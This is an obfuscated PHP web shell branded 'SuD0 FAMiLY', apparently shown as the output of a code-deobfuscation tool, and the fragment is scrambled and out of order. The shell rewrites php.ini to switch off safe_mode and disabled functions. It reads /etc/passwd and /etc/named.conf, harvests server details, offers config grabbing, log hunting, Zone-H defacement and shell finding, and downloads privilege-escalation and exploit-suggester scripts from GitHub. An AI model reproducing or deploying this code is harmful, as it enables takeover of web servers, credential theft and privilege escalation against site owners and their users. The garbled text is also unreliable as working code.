"\x68\164\x74\160\x73\72\x2f\x2f\x67\151\164\x68\x75\x62\56\x63\x6f\x6d\57\x64\151\145\x67\x6f\55\164\162\145\x69\164\x6f\163\57\x6c\x69\156\165\170\x2d\163\x6d\x61\162\x74\x2d\145\156\x75\x6d\x65\x72\141\x74\151\x6f\x6e\x2f\x72\141\x77\57\x6d\x61\163\x74\x65\x72\x2f\154\163\x65\56\163\150"); goto UCGcg; DWK4s: $sm = @ini_get(strtolower("\x73\141\146\x65\x5f\x6d\157\x64\145")) == "\x6f\156" ? "\x3c\146\x6f\156\x74\x20\x63\x6f\x6c\x6f\162\x3d\x72\x65\144\x3e\x4f\x4e\x3c\x2f\146\x6f\x6e\164\x3e" : "\74\x66\157\x6e\164\x20\x63\x6f\154\157\162\x3d\154\x69\155\145\76\x4f\x46\106\74\57\146\157\156\x74\x3e"; goto W2iG7; k9MqC: echo "\74\154\151\76\133\x20\74\x61\40\x68\162\145\x66\75\47\77\47\x3e\110\x6f\x6d\x65\74\x2f\141\76\40\135\74\57\154\151\76"; goto cIIZt; W2iG7: $ling = "\x68\x74\164\x70\x3a\x2f\x2f" . $_SERVER["\x53\x45\x52\x56\x45\x52\x5f\x4e\101\115\105"] . '' . $_SERVER["\120\110\120\137\123\x45\114\x46"] . "\x3f\x63\x72\x65\x61\164\x65"; goto n5p0r; fIVrs: ?>
<html><head><center><title>! SuD0 FAMiLY !</title><meta content="SudO Family!"name="author"><meta charset="UTF-8"><center><style type="text/css">@import url(https://fonts.googleapis.com/css?family=Ubuntu);html{background:url(https://4.bp.blogspot.com/-xTmw3tsMVDY/WAsldFnFfyI/AAAAAAAAIAM/a-t4T5U7UfI8EZE0frjNCUYQ6Rx1r4uzQCLcB/s1600/Hacker%2BBackground%2B7.jpg);color:red;font-family:abel;font-size:13px;width:100%}li{display:inline;margin:5px;padding:5px}table,td,th{border-collapse:collapse;font-family:Tahoma,Geneva,sans-serif;background:0 0;font-family:abel;font-size:13px}.table_home,.td_home,.th_home{border:1px solid #f51d1d}th{padding:10px}a{color:#19ce19;text-decoration:none}a:hover{color:gold;text-decoration:underline}b{color:gold}input[type=password],input[type=submit],input[type=text]{background:0 0;color:#fff;border:1px solid #fff;margin:5px auto;padding-left:5px;font-family:abel;font-size:13px}textarea{border:1px solid #fff;width:100%;height:400px;font-weight:900;padding-left:5px;margin:10px auto;resize:none;background:0 0;color:#1de4a8;font-family:abel;font-size:13px}select{width:152px;background:#000;color:#0ff;border:1px solid #fff;margin:5px auto;padding-left:5px;font-family:abel;font-size:13px}option:hover{background:#0ff;color:#000}</style></head><center><?php goto cDEsx; Q3IR8: $python = exe("\x70\x79\164\150\x6f\x6e\x20\x2d\55\x68\145\x6c\x70") ? "\74\x66\x6f\156\164\40\143\157\x6c\x6f\x72\75\x6c\151\155\145\76\x4f\116\x3c\x2f\146\157\x6e\164\76" : "\74\146\x6f\x6e\x74\40\143\157\x6c\x6f\x72\75\162\x65\144\76\x4f\x46\106\74\57\x66\157\x6e\164\x3e"; goto tKZOx; RC49a: echo "\x3c\x6c\151\76\133\x20\x3c\141\x20\x68\x72\x65\146\75\47\77\x64\151\x72\x3d{$dir}\x26\144\157\x3d\x61\142\x6f\x75\164\x27\x3e\x41\142\x6f\165\164\74\57\141\76\x20\x5d\74\x2f\x6c\151\76"; goto x0bfQ; n5p0r: $ds = @ini_get("\144\x69\x73\141\x62\x6c\x65\x5f\x66\x75\156\143\x74\x69\x6f\x6e\x73"); goto Y4IOJ; ZDo2T: CreateTools("\160\x72\151\166\x61\x74\x65", "\x68\x74\x74\x70\163\72\57\57\162\x61\x77\x2e\x67\x69\x74\x68\x75\x62\165\163\x65\162\x63\157\156\164\145\156\164\x2e\143\157\155\57\x72\x74\143\162\157\x77\154\145\x79\57\x6c\x69\156\x75\170\55\160\162\x69\x76\x61\x74\x65\55\x69\x2f\155\x61\x73\x74\145\162\57\160\162\151\166\x61\x74\145\x2d\x69\x2e\163\x68"); goto KpDSL; E0dHZ: error_reporting(0); goto Bk7Av; rf0wp: echo "\x3c\x6c\151\76\133\40\x3c\x61\x20\x68\x72\145\146\75\47\x3f\x64\x69\162\x3d{$dir}\46\x64\157\75\x70\141\x73\x73\x77\x62\x79\x70\141\163\163\x27\x3e\x42\171\160\141\163\163\40\145\x74\143\57\x70\141\163\x73\x77\74\57\x61\76\x20\135\74\x62\x72\76\74\57\x6c\151\76"; goto lL2r1; lL2r1: echo "\74\154\x69\76\133\x20\x3c\141\x20\150\162\x65\146\75\x27\77\144\151\162\x3d{$dir}\x26\144\157\x3d\x6c\x6f\x67\x68\165\156\164\145\x72\x27\x3e\x4c\157\147\x20\x48\165\x6e\x74\145\162\74\x2f\141\76\x20\x5d\74\x2f\154\x69\76"; goto oN4Wq; I5Yfd: echo "\x3c\154\x69\x3e\x5b\x20\x3c\x61\40\x68\x72\x65\x66\75\x27\77\144\x69\x72\x3d{$dir}\x26\144\157\75\143\x6f\x6e\x66\151\147\47\x3e\103\157\156\x66\x69\147\x3c\x2f\x61\76\x20\x5d\x3c\57\x6c\151\x3e"; goto F2emA; i0ZTx: echo "\x3c\57\x74\144\76\74\x2f\x74\162\x3e\x3c\x2f\x74\141\142\154\145\x3e\74\150\x72\x3e"; goto Wmtoe; FrCPJ: echo "\74\x68\x72\76"; goto HMHCF; eF3h9: echo "\x3c\x6c\151\x3e\x5b\40\74\x61\40\150\162\145\146\x3d\x27\77\144\x69\x72\75{$dir}\x26\x64\x6f\75\172\157\156\145\150\x27\x3e\132\x6f\x6e\145\55\x48\x3c\x2f\141\76\x20\135\74\57\x6c\151\76"; goto m9Ss5; JOCoy: CreateTools("\154\x65\163", "\150\x74\x74\160\x73\x3a\x2f\57\162\141\167\56\x67\151\164\x68\165\142\165\x73\145\x72\x63\x6f\x6e\164\x65\156\164\x2e\143\x6f\x6d\x2f\155\172\x65\x74\55\57\154\x69\156\165\x78\x2d\145\170\160\x6c\x6f\151\x74\x2d\x73\165\x67\147\145\163\x74\x65\x72\57\155\141\x73\x74\145\162\57\154\151\x6e\x75\x78\55\x65\170\160\x6c\x6f\x69\164\x2d\163\165\x67\147\145\163\x74\145\x72\x2e\x73\x68"); goto sSbF1; a1GtA: function w($dir, $perm) { if (!is_writable($dir)) { return "\74\146\157\156\x74\40\x63\x6f\154\157\162\x3d\162\x65\144\x3e" . $perm . "\x3c\57\146\x6f\x6e\x74\76"; } else { return "\74\x66\157\156\164\x20\x63\x6f\154\157\162\x3d\x6c\151\155\145\76" . $perm . "\x3c\57\146\x6f\156\164\76"; } } goto SLvTF; WpTW0: $users = @file("\x2f\145\164\143\x2f\x70\x61\x73\163\x77\144"); goto B1szS; nIl58: $color = "\x23\x46\106\x30\x30\60\x30"; goto hu4Fd; SmpFc: echo "\74\x74\x72\76\x3c\x74\x64\x3e\x53\171\x73\164\x65\x6d\72\x20\74\x66\x6f\156\164\x20\143\x6f\x6c\157\162\75\x6c\151\155\145\76" . php_uname() . "\x3c\x2f\x66\157\x6e\164\76\74\x2f\x74\144\x3e\x3c\57\x74\x72\76"; goto Jg1Vp; mKYab: echo "\x3c\x74\x72\x3e\x3c\164\144\76\x53\x65\162\166\x65\162\40\111\x50\72\x20\x3c\x66\157\x6e\x74\x20\x63\157\154\157\x72\75\x6c\x69\x6d\145\x3e" . gethostbyname($_SERVER["\x48\124\x54\x50\x5f\x48\117\x53\124"]) . "\74\57\x66\157\156\164\x3e\x20\174\x20\x59\x6f\165\162\40\x49\x50\72\40\x3c\146\x6f\x6e\x74\x20\143\157\x6c\x6f\162\x3d\154\151\x6d\x65\76" . $_SERVER["\122\x45\115\x4f\124\x45\137\101\x44\x44\x52"] . "\74\57\x66\x6f\156\x74\x3e\x3c\57\164\x64\x3e\x3c\57\x74\x72\76"; goto JLYm1; cDEsx: if (file_exists("\160\150\x70\x2e\x69\156\151")) { } else { $img = fopen("\x70\150\160\56\151\156\151", "\x77"); $sec = "\x73\141\x66\x65\137\155\157\144\x65\40\75\x20\117\106\x46\12\x64\151\x73\141\142\154\x65\x5f\146\165\x6e\x74\x69\157\156\163\40\x3d\x20\x4e\x4f\x4e\105"; fwrite($img, $sec); fclose($img); } goto a1GtA; JLYm1: echo "\74\164\x72\x3e\74\164\144\x3e\110\x44\x44\x3a\40\x3c\x66\157\156\x74\x20\143\x6f\x6c\157\x72\75\154\151\x6d\145\x3e" . hdd(disk_free_space("\57")) . "\74\57\146\157\156\164\x3e\x20\57\x20\74\146\x6f\x6e\164\40\143\157\x6c\157\162\75\x6c\x69\x6d\x65\76" . hdd(disk_total_space("\x2f")) . "\x3c\x2f\146\x6f\156\x74\x3e\x3c\57\164\x64\x3e\74\57\x74\x72\x3e"; goto iHrZU; YTSct: $scdir = explode("\x2f", $dir); goto DWK4s; Knirt: echo "\x3c\x6c\x69\76\x5b\40\74\141\40\150\162\145\x66\75\47\x3f\144\151\162\75{$dir}\46\x64\x6f\x3d\x73\150\x65\154\x73\143\x61\156\x27\x3e\x53\150\x65\x6c\154\x20\x46\x69\x6e\144\x65\x72\74\57\141\x3e\x20\135\x3c\x2f\x6c\151\76"; goto j4gEb; CDb2j: echo "\74\164\x72\x3e\74\x74\144\x3e\123\141\146\x65\40\115\x6f\x64\x65\x3a\40{$sm}\x3c\x2f\x74\144\76\x3c\57\164\162\76"; goto ryNNe; ZsvGm: $default_use_ajax = true; goto lDjYb; F2emA: echo "\x3c\x6c\151\76\x5b\x20\74\141\x20\x68\x72\145\146\75\x27\x3f\144\x69\x72\75{$dir}\46\144\x6f\x3d\154\143\x66\x27\76\114\151\164\x65\x53\x70\145\145\144\x20\103\157\156\x66\151\x67\74\57\x61\x3e\x20\x5d\x3c\x2f\154\x69\76"; goto bhf0C; KSQHh: $d0mains = @file("\57\145\x74\143\57\156\x61\155\x65\144\56\x63\157\x6e\146"); goto WpTW0; HnvhT: echo "\x3c\x6c\x69\76\x5b\40\x3c\141\x20\150\162\x65\x66\x3d\47\77\x64\x69\x72\x3d{$dir}\46\144\x6f\75\x61\x64\155\151\156\145\162\x27\x3e\101\x64\x6d\x69\x6e\x65\162\x3c\x2f\x61\76\x20\135\74\x2f\154\x69\x3e"; goto JJlv1; FpftJ: $sport = $_SERVER["\x53\105\x52\126\105\x52\x5f\120\117\x52\x54"]; goto RBPXg; Lule7: ?>
</html>Function Calls
| None |
Stats
| MD5 | a89d26a566f7ff98e9ff58a588b49a29 |
| Eval Count | 0 |
| Decode Time | 457 ms |